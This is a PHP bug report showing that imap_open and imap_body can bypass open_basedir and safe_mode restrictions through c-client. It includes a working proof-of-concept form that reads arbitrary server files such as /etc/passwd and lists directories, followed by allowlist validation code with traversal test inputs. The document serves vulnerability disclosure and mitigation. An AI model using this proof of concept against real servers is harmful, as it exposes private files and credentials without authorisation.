From: Challii at btinternet dot com
Operating system: RHE3
PHP version: 4.4.2
PHP Bug Type: IMAP related
Bug description: imap_body able to bypass php_openbasedir
Description:
------------
Vulnerability in the c-client library (tested with versions 2000, 2001, 2004): mail_open could be used to open a stream to local files. For PHP and the imap module, imap_open allows bypassing safe_mode and open_basedir restrictions. Use imap_body or others to view a file and imap_list to recursively list a directory. s/mailbox/file :) imap_createmailbox, imap_deletemailbox, imap_renamemailbox create, delete and rename files with Apache privileges.

Reproduce code:
---------------
##### code #####
<form action="" method="post">
  <select name="switch">
    <option selected="selected" value="file">View file</option>
    <option value="dir">View dir</option>
  </select>
  <input type="text" size="60" name="string">
  <input type="submit" value="go">
</form>
<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
    // The user-supplied string goes straight to imap_open(); c-client treats a
    // bare path as a local mailbox, so the file is opened as a mail stream.
    $stream = imap_open($string, "", "");
    if ($stream == FALSE) die("Can't open imap stream");
    $str = imap_body($stream, 1);
    if (!empty($str)) echo "<pre>" . $str . "</pre>";
    imap_close($stream);
} elseif ($string && $switch == "dir") {
    // Any readable local file yields a stream handle that imap_list() accepts.
    $stream = imap_open("/etc/passwd", "", "");
    if ($stream == FALSE) die("Can't open imap stream");
    // Input is "<reference>|<pattern>"; the pattern defaults to "*".
    $string = explode("|", $string);
    if (count($string) > 1)
        $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
    else
        $dir_list = imap_list($stream, trim($string[0]), "*");
    echo "<pre>";
    for ($i = 0; $i < count($dir_list); $i++)
        echo "$dir_list[$i]\n";
    echo "</pre>";
    imap_close($stream);
}
?>
################

Expected result:
----------------
That the file could not be accessed due to a security permission.

Actual result:
--------------
The ability to see any file on the server.
-- Edit bug report at http://bugs.php.net/?id=37265&edit=1
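The root cause above is that a user-controlled mailbox string reaches imap_open() unchanged, and c-client interprets a bare path as a local mailbox. An application-level mitigation that does not depend on the interpreter enforcing open_basedir for imap_open() is to accept only remote mailbox specifications against a host allowlist. The code below is an added example written for this report; it is not the reporter's code and not part of PHP or c-client. It assumes the c-client remote spec syntax "{host[:port][/flag...]}mailbox", and the allowed host, flag list, and demo inputs are constructed for illustration (modern PHP syntax, 7.1 or later).

```php
<?php
// Added example (not from the bug report): allowlist validation for
// imap_open() mailbox strings. Anything that is not a well-formed remote
// spec "{host[:port][/flag...]}mailbox" is rejected, so bare paths such
// as /etc/passwd never reach c-client as a local mailbox.

const ALLOWED_IMAP_HOSTS = ['imap.example.com'];   // constructed allowlist

// Connection flags this application is willing to pass through (constructed,
// conservative; extend only with flags the deployment actually needs).
const ALLOWED_IMAP_FLAGS = ['imap', 'ssl', 'tls', 'notls', 'validate-cert', 'novalidate-cert', 'readonly'];

/**
 * Returns the spec unchanged if it is safe to hand to imap_open(), else null.
 */
function validate_mailbox_spec(string $spec, array $allowedHosts = ALLOWED_IMAP_HOSTS): ?string
{
    // Require the braces form. Host may not contain ':', '/', '{' or '}'
    // (IPv6 literals are deliberately not supported by this conservative check).
    $re = '/^\{([^{}\/:]+)(?::(\d{1,5}))?((?:\/[A-Za-z0-9_-]+)*)\}([^{}]*)$/';
    if (!preg_match($re, $spec, $m)) {
        return null;
    }
    [, $host, $port, $flags, $mailbox] = $m;

    // Host must be on the allowlist (case-insensitive DNS name comparison).
    $allowed = array_map('strtolower', $allowedHosts);
    if (!in_array(strtolower($host), $allowed, true)) {
        return null;
    }

    // Port, when given, must be a valid TCP port.
    if ($port !== '' && ((int) $port < 1 || (int) $port > 65535)) {
        return null;
    }

    // Every "/flag" segment must be one we explicitly permit.
    foreach (array_filter(explode('/', $flags)) as $flag) {
        if (!in_array($flag, ALLOWED_IMAP_FLAGS, true)) {
            return null;
        }
    }

    // Mailbox part stays a plain relative name: no separators, traversal or NULs.
    // (Servers using '/' as hierarchy delimiter would need a tighter rule than rejection.)
    if ($mailbox === '' || strpbrk($mailbox, "/\\\0") !== false || strpos($mailbox, '..') !== false) {
        return null;
    }

    return $spec;
}

/**
 * Wrapper around imap_open() that only ever sees validated remote specs.
 * Returns the stream resource or false, mirroring imap_open() itself.
 */
function open_mailbox(string $spec, string $user, string $pass)
{
    $valid = validate_mailbox_spec($spec);
    if ($valid === null) {
        return false;
    }
    return imap_open($valid, $user, $pass, OP_READONLY);
}

/**
 * Demonstrates the check on constructed inputs, including the bare path
 * from the report; returns a map of input => "accepted"/"rejected".
 */
function demo(): array
{
    $cases = [
        '/etc/passwd',                              // bare local path (the report's case)
        '{imap.example.com:993/imap/ssl}INBOX',     // allowed host, permitted flags
        '{imap.example.com}../../etc/passwd',       // traversal in the mailbox part
        '{other.example.org}INBOX',                 // host not on the allowlist
        '{imap.example.com/debug}INBOX',            // flag not on the allowlist
    ];
    $out = [];
    foreach ($cases as $c) {
        $out[$c] = validate_mailbox_spec($c) === null ? 'rejected' : 'accepted';
    }
    return $out;
}

foreach (demo() as $input => $verdict) {
    echo str_pad($verdict, 9), $input, "\n";
}
```

Only the second input is accepted; the bare path, the traversal attempt, the foreign host and the unknown flag are all refused before imap_open() is called. The allowlist is the important part: matching the brace syntax alone is not enough, because the host and flag portions are also attacker-controlled when the spec comes from a request.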